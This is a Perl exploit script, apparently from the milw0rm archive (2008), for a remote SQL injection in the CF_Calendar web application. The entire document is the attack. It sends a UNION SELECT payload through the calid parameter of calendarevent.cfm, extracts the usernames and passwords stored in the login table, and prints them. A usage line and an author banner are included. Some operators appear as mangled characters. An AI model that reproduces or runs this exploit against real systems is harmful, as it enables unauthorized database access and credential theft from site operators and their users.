1 #!/usr/bin/perl
2
3
4 use HTTP::Request;
5 use LWP::UserAgent;
6
7
8
9 print "\n ********************************************\n";
10 print " * CF_Calendar Remote SQL Injection Exploit *\n";
11 print " * By AlpHaNiX *\n";
12 print " ********************************************\n";
13 print " ********************************************\n";
14 print " * usage : perl exploit.pl target *\n";
15 print " * contact : AlpHa[AT]HACKER[DOT]BZ *\n";
16 print " ********************************************\n";
17
18
19
20 $alpha1 = "calendarevent.cfm?calid=";
21 $alpha2 = "0+union+select+1,concat(0x20616c7068616e69787761736865726520,username,0x20616e642070617373776f7264206973203a20,password,0x20616c70686
16e69787761736865726520),3,4,null,6,7,8,9+from+login";
22
23
24
25 if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; }
26 print " Working on it\n\n";
27
28 my $alpha3 = $target.$alpha1.$alpha2;
29 my $request = HTTP::Request−>new(GET=>$alpha3);
30 my $useragent = LWP::UserAgent−>new();
31 $useragent−>timeout(10);
32 my $response = $useragent−>request($request);
33 if ($response−>is_success) {
34 my $res = $response−>content;
35 if ($res =~ m/ alphanixwashere (.*)and password is : (.*) alphanixwashere /g) {
36 my ($username,$passwd) = ($1,$2);
37 print "Username : $username \n\n password : $passwd \n\n"
38
39 }
40 else { print " operation failed \n\n"; }
41 }
42 else { print " Error, ".$response−>status_line."\n\n"; }
43
44 # milw0rm.com [2008−12−10]
Page 1/1
CF_Calendar calendarevent.cfm Remote SQL Injection Exploit
AlpHaNiX
12/10/2008